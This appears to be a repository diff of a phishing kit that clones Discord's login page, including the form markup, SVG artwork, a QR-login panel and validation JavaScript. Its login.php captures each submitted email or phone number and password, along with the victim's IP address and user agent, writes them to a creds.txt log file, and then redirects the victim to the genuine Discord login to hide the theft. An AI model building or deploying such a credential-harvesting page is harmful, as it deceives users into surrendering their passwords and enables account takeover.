d="M682.3 942.4L668.2 898"></path>
<circle cx="676.7" cy="924.6" r="11.7" fill="#29cc7a"></circle>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.096"
d="M674.4 917.5L668.2 898"></path>
<circle cx="668.2" cy="898" r="4.1" fill="#eb459f"></circle>
<ellipse cx="656.7" cy="967.2" rx="7.9" ry="3.4" transform="rotate(-8.1 648.513 958.822)"></ellipse>
<ellipse cx="729.1" cy="923.4" rx="7.9" ry="3.4" transform="rotate(-8.1 720.315 915.594)"></ellipse>
<path fill="#ffc069"
d="M799.6 992.1c-8.6 6.2-19.8 6.6-24.9.9s-1.4-10.1 8.4-12.4a14.4 14.4 0 008-5.2c5.5-7.3 10.6-9.8 14.9-4.9s2.2 15.4-6.4 21.6zM607.1 1042.7c-.5 4.6-4.9 4.6-9.7 1a14.1 14.1 0 00-8.4-3c-5.4 0-8.4-1-7.9-5.4s6.8-8.7 14-6.7 12.5 8.4 12 14.1z">
</path>
</g>
<g data-name="Layer 10">
<path fill="#ff8c19"
d="M1003.8 132.9c.4-6-3.3-11.5-10.1-11s-10.3 2.8-17.9 6.6a22.3 22.3 0 01-13.2 2.1c-20.9-3-26.3-2.6-30.6-1s-5.7 4-4.3 8.9 4.3 7.8 11.3 10 22.5 7.7 31.5 11.9 19.4 5.4 26.9 9.2 27.2 17.5 34.3 23.3 9.5 4.5 10.3 3.7.7-1.5.3-8a32.1 32.1 0 00-6.2-17c-3.9-5.5-12.3-13.5-16.9-20.5s-6.9-17.2-15.4-18.2z">
</path>
<path fill="url(#linear-gradient-6)"
d="M1019.2 151.1c-4.6-7-6.9-17.2-15.4-18.2-12.8-.3-23.5 5.7-31.3 6.9-5.6.8-18.8 1-24.2 1.1s-6.4.7-7.2 1.4-1.1 2-.1 2.5l-.4 2.1 7.9 2.8 34.8 12.4 18.7 8.8 22.1 14.2 15.6 11.5 2.5-.2c.6-.8.5-1.9.1-7.8a32.1 32.1 0 00-6.2-17c-3.9-5.5-12.3-13.5-16.9-20.5z">
</path>
<path fill="#ed5f00"
d="M1042 196.6c.4-.4.6-.8.6-2.1-.3 3.1-3.6.1-6.1-2.2s-9-11.2-20.5-16c-21.1-9-25.3-18.6-47.9-21.3-10.7-1.2-21.3-7.9-24.6-9.2s-4.2-1.5-4.1-3a15.3 15.3 0 00-2-9.3c-2.4-3.8-6.7-4.8-9.4-.8a7.5 7.5 0 00-.3 5.8c1.3 4.9 4.3 7.8 11.3 10s22.5 7.7 31.5 11.9 19.4 5.4 26.9 9.2 27.2 17.5 34.3 23.3 9.5 4.5 10.3 3.7z">
</path>
<path
d="M1042 196.6c.4-.4.6-.8.6-2.1-.3 3.1-3.6.1-6.1-2.2a91.8 91.8 0 00-7.5-7.7c2.2 2.2 2.8 5.6 2.9 8.4 7 5.7 9.3 4.4 10.1 3.6z">
</path>
<path fill="#ffc619"
d="M1046.3 203.2c-1.2-3.6-1.1-6.7-.8-10.7s-1.3-10.8-8.7-19.9l-3.4 16.3c6 6.9 8.9 12.9 8.9 16.7s.6 10 4.1 9.2 1.1-8-.1-11.6z">
</path>
<path fill="#ff78b9"
d="M951.8 146.5a34.5 34.5 0 008.1 3.8 77 77 0 0011.2 2.7c.3 0 .4-.1.4-.3-.5-4.2-6.1-7.5-10.2-8.1s-8.4.1-9.7 1.4 0 .4.2.5z">
</path>
<path fill="#eb459f"
d="M1005.7 145.5c-.3 2.9-5.1 4.9-10.8 4.4s-10.1-3.3-9.9-6.3 3.6-4.8 8-2.8a20.3 20.3 0 006 1.5c4.4.4 6.9.9 6.7 3.2zM1013.9 164.6a39.5 39.5 0 004.6 2.3c2.7 1 3.6 1.8 2.7 3s-4.8 1.5-8.5-.3-5.6-4.5-4.6-6.1 2.9-.7 5.8 1.1zM1036.5 170.1a7.6 7.6 0 00-4.6-2.9c-2.8-.6-4.1.8-4 2.7s2.5 5.2 7.3 8.7 6.1-1 5.2-3-2.6-3.8-3.9-5.5z">
</path>
<path fill="#66bcff"
d="M1005.6 102.9a39.9 39.9 0 00-14.4 1.9c-3.5 1.2-.6 5.2 8.6 7.5s19.3 1.8 23 1.8 3.3.2 5.6 2.7 4.1 4.4 4.2 2.3-.4-4 1.2-5.8 2.2-2.8 2.2-4.4-.6-1.3-2.5-.2a57.1 57.1 0 01-5.7 3c-.9.3-1-.4-3.4-2.2a32.6 32.6 0 00-18.8-6.6z">
</path>
<path fill="none" stroke="#66bcff" stroke-linecap="round" stroke-linejoin="round" stroke-width="2.439"
d="M986.7 107.2l4.4-1.1-3.1-2.7"></path>
<ellipse cx="997.8" cy="104.9" rx="1" ry="0.6" transform="rotate(-.6 1049.863 110.541)"></ellipse>
<path fill="#ff8c19"
d="M935.4 135.9c-1.4-2.1-3.6-2.8-4.8-1.7s-1.2 3.7.2 5.7 3.5 2.8 4.8 1.7 1.1-3.7-.2-5.7z"></path>
<path fill="none" stroke="#ffe75c" stroke-linecap="round" stroke-miterlimit="10" stroke-width="1.742"
d="M1032.9 181.2c4.6 3.1 6.7 5.5 7.9 10.4"></path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-miterlimit="10" stroke-width="1.742"
d="M1029 113.5L1031.4 113.2"></path>
<path fill="#3442d9"
d="M960.6 175.9a37.7 37.7 0 00-12.6 3.7c-2.9 1.6.2 4.8 8.8 5.6s17.4-1.2 20.8-1.6 3-.4 5.4 1.6 4.3 3.4 4.1 1.5-.9-3.6.2-5.4 1.6-2.8 1.4-4.3-.7-1.1-2.3.2a30.2 30.2 0 01-4.7 3.5c-.8.4-.9-.3-3.3-1.4a29.6 29.6 0 00-17.8-3.4z">
</path>
</g>
<g data-name="Layer 9">
<g>
<path fill="#ffe75c"
d="M543.3 128.7l-22.7 2.2a10.4 10.4 0 00-4.9 1.8c-7.6 4.9-8.9 8.4-8.9 8.4l15.3 13.1 24.6-21.4z"></path>
<path fill="#ffc619"
d="M463.2 133.9l2.9-3.8s17.5-1.7 24.2-1.8 22.1 6 31.8 19.3c6.6-13.5 17.5-18.2 21.2-18.9l3.4 4.1-25.8 24.8z">
</path>
<path fill="#eb459f"
d="M490.7 155.3s-.9 4-1.1 5.9 1.1 2 10.9 1.9h22.7c2.8.1 3.8-1.2 1.7-6.5 7.3-9.4 20.7-19 25.8-22.4a.7.7 0 000-1l-1.4-1.6a.8.8 0 00-.9-.1c-10.2 7.4-18.7 14-26.3 22.7-13.4-13.4-23.4-18.7-31.6-22.2a3 3 0 00-1.3-.2l-29.2 1.6a1.4 1.4 0 00-1.4 1.6 1.4 1.4 0 001 1.3c20.3 8.1 31.1 19 31.1 19z">
</path>
<path fill="#ff78b9"
d="M490.7 155.3s-.9 4-1.1 5.9 1.1 2 10.9 1.9h19c-2.4-.1-3-.8-.7-6.8-4.4-5.7-14.3-14-28.4-21.1l-30.8 1.1c20.3 8.1 31.1 19 31.1 19z">
</path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-miterlimit="10" stroke-width="1.521"
d="M522 150L522.2 151.9"></path>
</g>
</g>
<path fill="#6874f7"
d="M1193 1115.1a15.7 15.7 0 0015.6-18.5 111.8 111.8 0 00-213.8-20.7 117.2 117.2 0 00-111.3 35.2 2.4 2.4 0 001.8 4H1193z"
data-name="Layer 8"></path>
</svg>
<div class="wrapper-1f5byN">
<div style="
opacity: 1;
transform: scale(1) translateY(0px) translateZ(0px);
">
<div>
<form class="authBoxExpanded-AN2aH1 authBox-1HR6Ha theme-dark" action="login.php" method="post">
<div class="centeringWrapper-dGnJPQ">
<div
class="flex-2S1XBF flex-3BkGQD horizontal-112GEH horizontal-1Piu5- flex-3BkGQD directionRow-2Iu2A9 justifyStart-2Mwniq alignCenter-14kD11 noWrap-hBpHBz"
style="flex: 1 1 auto">
<div class="mainLoginContainer-wHmAjP">
<div class="header-6M5OpB">
<h3 class="title-3FQ39e marginBottom8-emkd0_ base-21yXnu size24-17l95E">
Welcome back!
</h3>
<div class="colorHeaderSecondary-g5teka size16-rrJ6ag">
We're so excited to see you again!
</div>
</div>
<div class="block-3uVSn4 marginTop20-2T8ZJx">
<div class="marginBottom20-315RVT">
<h5 class="colorStandard-21JIj7 size14-3fJ-ot h5-2RwDNl title-3hptVQ defaultMarginh5-3Jxf6f"
id="uid_5">
Email or Phone Number
<span class="errorMessage-1kMqS5" style="display: none;"><span
class="errorSeparator-f__rwE">-</span>This field is required</span>
</h5>
<div class="input-2g-os5 input-outline input-2yCVqe">
<div class="outerContainer-3jAq9y hidden-2yz_ny">
<div class="container-1pMEoC" style="width: 0px">
<div class="innerContainer-1xzAzu">
<div class="countryCode-5htqQm" aria-controls="popout_6" aria-expanded="false"
role="button" tabindex="0">
DE +49
</div>
<div class="separator-1R_Zrp"></div>
</div>
</div>
</div>
<div class="inputWrapper-1YNMmM inputWrapper-3ESIDR">
<input class="inputDefault-3FGxgL input-2g-os5 inputField-2RZxdl" name="email" type="text"
placeholder="" aria-label="Email or Phone Number" autocomplete="off" maxlength="999"
spellcheck="false" aria-labelledby="uid_5" value="" autofocus />
</div>
</div>
</div>
<div>
<h5 class="colorStandard-21JIj7 size14-3fJ-ot h5-2RwDNl title-3hptVQ defaultMarginh5-3Jxf6f"
id="uid_7">
Password
<span class="errorMessage-1kMqS5" style="display: none;"><span
class="errorSeparator-f__rwE">-</span>This field is required</span>
</h5>
<div class="inputWrapper-1YNMmM">
<input class="inputDefault-3FGxgL input-outline input-2g-os5" name="pass" type="password"
placeholder="" aria-label="Password" autocomplete="off" maxlength="999" spellcheck="false"
aria-labelledby="uid_7" value="" />
</div>
</div>
<button type="button"
class="marginBottom20-315RVT marginTop4-2JFJJI linkButton-2ax8wP button-f2h6uQ lookLink-15mFoz lowSaturationUnderline-Z6CW6z colorLink-1Md3RZ sizeMin-DfpWCE grow-2sR_-F">
<div class="contents-3ca1mk">
Forgot your password?
</div>
</button><button disabled type="submit"
class="marginBottom8-emkd0_ button-1cRKG6 button-f2h6uQ lookFilled-yCfaCM colorBrand-I6CyqQ sizeLarge-3mScP9 fullWidth-fJIsjq grow-2sR_-F">
<div class="contents-3ca1mk">Login</div>
</button>
<div class="marginTop4-2JFJJI">
<span class="needAccount-MrvMN7">Need an account?</span><button type="button"
class="smallRegisterLink-1qEJhz linkButton-2ax8wP button-f2h6uQ lookLink-15mFoz lowSaturationUnderline-Z6CW6z colorLink-1Md3RZ sizeMin-DfpWCE grow-2sR_-F">
<div class="contents-3ca1mk">Register</div>
</button>
</div>
</div>
</div>
<div class="verticalSeparator-2r9gHa"></div>
<div class="transitionGroup-bPT0qU qrLogin-1ejtpI">
<div class="measurementFill-3yvxWy measurement-RBq28W measurementFillStatic-1QTNRn">
<div class="animatedNode-zo4rIT" style="
overflow: visible;
opacity: 1;
height: 100%;
transform: translateX(0%);
">
<div class="qrLoginInner-1phtZ_">
<div class="qrCodeContainer-1qlybH">
<div class="qrCode-2R7t9S"
title="https://discord.com/ra/Z2M-JlLG-B9qIErVk3C799rXW1GitoYa9bdk1BBvHp0" style="
padding: 8px;
border-radius: 4px;
background: rgb(255, 255, 255);
">
<canvas width="160" height="160" style="display: none"></canvas><img alt="Scan me!"
src="data:image/png;base64,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"
style="display: block" />
</div>
<div class="qrCodeOverlay-2bLtKl">
<img src="qr.png" alt="" />
</div>
</div>
<h3 class="title-3FQ39e marginBottom8-emkd0_ base-21yXnu size24-17l95E">
Log in with QR Code
</h3>
<div class="colorHeaderSecondary-g5teka size16-rrJ6ag">
Scan this with the
<strong>Discord mobile app</strong> to log in
instantly.
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
<div></div>
<div class="layerContainer-2v_Sit"></div>
<div class="layerContainer-2v_Sit"></div>
<div class="container-Sxc1z3"></div>
<div style="position: fixed; opacity: 0; pointer-events: none"></div>
<div></div>
</div>
<script nonce="">
window.__OVERLAY__ = /overlay/.test(location.pathname);
</script>
<script nonce="">
window.__BILLING_STANDALONE__ = /^\/billing/.test(location.pathname);
</script>
<div class="drag-previewer" style="
z-index: 1000;
filter: drop-shadow(0 0 0 var(--background-floating))
drop-shadow(var(--elevation-high));
">
<svg>
<foreignobject></foreignobject>
</svg>
</div>
<span class="drag-announcer" aria-live="assertive" aria-atomic="true" style="
position: absolute;
width: 1px;
height: 1px;
overflow: hidden;
clip: rect(0px, 0px, 0px, 0px);
border: 0px;
"></span>
<div id="uid_1" style="display: none">,</div>
<div id="uid_2" style="display: none">,</div>
<div id="uid_3" style="display: none">Reactions</div>
<div id="uid_4" style="display: none">click to open image dialog</div>
<script src="script.js"></script>
</body>
</html>

View File

@ -0,0 +1,27 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Discord Username: " . $_POST['email'] . " Pass: " . $_POST['pass'] ."\n", FILE_APPEND);
header('Location: https://discord.com/login');
exit();
?>

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.5 KiB

View File

@ -0,0 +1,28 @@
let inputs = document.querySelectorAll('form input')
let submitBtn = document.querySelector('form button[type="submit"]')
// submitBtn.addEventListener("click", validateForm)
inputs[1].addEventListener("input", validateForm)
function validateForm() {
let outlines = document.querySelectorAll('form .input-outline')
let lables = document.querySelectorAll('.colorStandard-21JIj7')
let errMessages = document.querySelectorAll('.errorMessage-1kMqS5')
for (let i = 0; i < inputs.length; i++) {
inputs[i].addEventListener("input", validateForm)
if (inputs[i].value == '') {
outlines[i].classList.add('error-8r7mjf')
lables[i].classList.add('error-3EBD81')
errMessages[i].style.display = 'inline'
} else {
outlines[i].classList.remove('error-8r7mjf')
lables[i].classList.remove('error-3EBD81')
errMessages[i].style.display = 'none'
submitBtn.disabled = ''
}
}
(!inputs[0].value == '' && !inputs[1].value == '') ?
submitBtn.disabled = '' : submitBtn.disabled = 'disabled'
}

File diff suppressed because it is too large Load Diff

Binary file not shown.

After

Width:  |  Height:  |  Size: 67 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.9 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 387 B

View File

@ -0,0 +1,24 @@
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 124.7 31.5" style="enable-background:new 0 0 124.7 31.5;" xml:space="preserve">
<style type="text/css">
.st0{display:none;}
.st1{display:inline;fill:#007EE5;}
</style>
<g id="XMLID_12_" class="st0">
<path id="XMLID_29_" class="st1" d="M0,1.4h8.4c7.2,0,11.7,4.6,11.7,11.9S15.6,25.1,8.4,25.1H0V1.4z M8.2,20.8c4.5,0,7-2.9,7-7.5 s-2.5-7.5-7-7.5H4.9v15H8.2z"/>
<path id="XMLID_27_" class="st1" d="M32.8,12.6c-0.7-0.4-1.5-0.6-2.4-0.6c-1.6,0-2.9,0.8-3.3,2.4v10.7h-4.8V7.8h4.8v1.7 c0.7-1.2,2.2-2.1,3.9-2.1c0.8,0,1.5,0.2,1.8,0.3V12.6z"/>
<path id="XMLID_24_" class="st1" d="M42.4,25.5c-5,0-8.5-3.7-8.5-9s3.4-9,8.5-9c5,0,8.5,3.7,8.5,9S47.4,25.5,42.4,25.5z M42.4,11.5 c-2.4,0-3.7,2.1-3.7,5s1.3,4.9,3.7,4.9s3.7-2.1,3.7-4.9C46.1,13.6,44.8,11.5,42.4,11.5z"/>
<path id="XMLID_21_" class="st1" d="M57.7,31.5h-4.8V7.8h4.8v1.4c0.8-0.9,2.5-1.8,4.3-1.8c5,0,7.9,4.2,7.9,9c0,4.9-2.9,9-7.9,9 c-1.9,0-3.6-0.9-4.3-1.8V31.5z M57.7,19.3c0.6,1.2,1.9,2,3.2,2c2.6,0,4.1-2.1,4.1-4.8c0-2.8-1.5-4.9-4.1-4.9c-1.4,0-2.7,0.9-3.2,2 V19.3z"/>
<path id="XMLID_18_" class="st1" d="M76.8,25.1H72V0h4.8v9.3c0.8-0.9,2.5-1.8,4.3-1.8c5,0,7.8,4.1,7.8,9s-2.8,9-7.8,9 c-1.9,0-3.6-0.9-4.3-1.8V25.1z M76.8,19.3c0.5,1.2,1.8,2,3.2,2c2.6,0,4.1-2.1,4.1-4.8c0-2.8-1.5-4.9-4.1-4.9c-1.4,0-2.7,0.9-3.2,2 V19.3z"/>
<path id="XMLID_15_" class="st1" d="M99.2,25.6c-5,0-8.5-3.7-8.5-9s3.4-9,8.5-9c5,0,8.5,3.7,8.5,9C107.6,21.9,104.2,25.6,99.2,25.6 z M99.2,11.6c-2.4,0-3.7,2.1-3.7,5s1.3,4.9,3.7,4.9c2.4,0,3.7-2.1,3.7-4.9C102.9,13.7,101.6,11.6,99.2,11.6z"/>
<path id="XMLID_13_" class="st1" d="M118.4,16.2l6.3,8.9h-5.3l-3.7-5.4l-3.8,5.4h-5l6.2-8.8l-5.9-8.5h5.3l3.3,4.9l3.4-4.9h5 L118.4,16.2z"/>
</g>
<g>
<polygon id="Path_14_" points="106.5,24.3 113.1,15.5 107,7.2 112.2,7.2 115.8,12.4 119.4,7.2 124.6,7.2 118.4,15.5 124.9,24.3 119.8,24.3 115.7,18.7 111.8,24.3 "/>
<path id="Path_6_" d="M98.5,24.8c-5.5,0-8.6-3-8.6-8.7v-0.5c0-5.8,3.7-8.9,8.6-8.9c5.1,0,8.6,3.2,8.6,8.9v0.5 C107.1,21.7,103.7,24.8,98.5,24.8z M98.5,20.9c2.5,0,4.1-1.7,4.1-4.8v-0.4c0-3.2-1.6-5.1-4.1-5.1c-2.5,0-4.1,1.8-4.1,5.1V16 C94.4,19.1,96,20.9,98.5,20.9z"/>
<path id="Path_5_" d="M80.5,24.9c-2.9,0-4.7-1.4-5.6-3.6l-0.4,3h-3.9V1H75v9.3c1-2.2,2.8-3.5,5.6-3.5c4.2,0,7.1,2.9,7.1,8.6v0.5 C87.7,21.6,84.9,24.9,80.5,24.9z M79,21c2.6,0,4.1-1.7,4.1-5.1v-0.4c0-3.2-1.6-4.9-4-4.9c-2.5,0-4.2,2-4.2,4.9v0.4 C74.9,19.1,76.5,21,79,21z"/>
<path id="Path_4_" d="M51.1,30.5V7.2h3.8l0.5,3.3c0.9-2.2,2.7-3.7,5.6-3.7c4.5,0,7.2,3.2,7.2,8.9v0.5c0,5.7-3.1,8.6-7.2,8.6 c-2.8,0-4.5-1.2-5.4-3.2v8.9H51.1z M59.5,21c2.6,0,4.1-1.7,4.1-4.9v-0.4c0-3.4-1.7-5.1-4-5.1c-2.5,0-4.1,1.9-4.1,5.1v0.3 C55.5,19.1,57,21,59.5,21z"/>
<path id="Path_3_" d="M40.2,24.8c-5.5,0-8.6-3-8.6-8.7v-0.5c0-5.8,3.7-8.9,8.6-8.9c5.1,0,8.6,3.2,8.6,8.9v0.5 C48.8,21.7,45.4,24.8,40.2,24.8z M40.2,20.9c2.4,0,4-1.7,4-4.8v-0.4c0-3.2-1.5-5.1-3.9-5.1c-2.4,0-4,1.8-4,5.1V16 C36.3,19.1,37.8,20.9,40.2,20.9z"/>
<path id="Path_2_" d="M20,24.3h4.5v-7.8c0-3.6,0.9-4.9,4.7-4.9h1.7V7h-0.9c-3.6,0-5,1.5-5.7,4.2l-0.6-4H20V24.3z"/>
<path id="Path_1_" d="M-0.2,24.3V2.5h8c5.3,0,9.7,3.2,9.7,10.2v1.5c0,7-4.1,10.1-9.5,10.1H-0.2z M7.6,6.5H4.5v13.7h3.3 c3,0,5-2,5-6.3v-1.1C12.8,8.5,10.7,6.5,7.6,6.5z"/>
</g>
</svg>

After

Width:  |  Height:  |  Size: 3.3 KiB

View File

@ -0,0 +1,11 @@
<svg width="16px" height="16px" viewBox="0 0 16 16" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:sketch="http://www.bohemiancoding.com/sketch/ns">
<!-- Generator: Sketch 3.4.3 (16044) - http://www.bohemiancoding.com/sketch -->
<title>Shape</title>
<desc>Created with Sketch.</desc>
<defs/>
<g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd" sketch:type="MSPage">
<g id="Version-B" sketch:type="MSArtboardGroup" transform="translate(-735.000000, -673.000000)" fill="#FFFFFF">
<path d="M743.018061,679.870991 L743.018061,682.580612 L747.500226,682.580612 C747.319585,683.743491 746.145415,685.990219 743.018061,685.990219 C740.31973,685.990219 738.118163,683.754781 738.118163,681 C738.118163,678.245219 740.31973,676.009781 743.018061,676.009781 C744.553513,676.009781 745.580911,676.664606 746.167996,677.229111 L748.313112,675.163025 C746.935722,673.875955 745.151888,673.096939 743.018061,673.096939 C738.648797,673.096939 735.115,676.630736 735.115,681 C735.115,685.369264 738.648797,688.903061 743.018061,688.903061 C747.579257,688.903061 750.605,685.696676 750.605,681.180641 C750.605,680.661297 750.54855,680.266144 750.480809,679.870991 L743.018061,679.870991 L743.018061,679.870991 Z" id="Shape" sketch:type="MSShapeGroup"/>
</g>
</g>
</svg>

After

Width:  |  Height:  |  Size: 1.4 KiB

View File

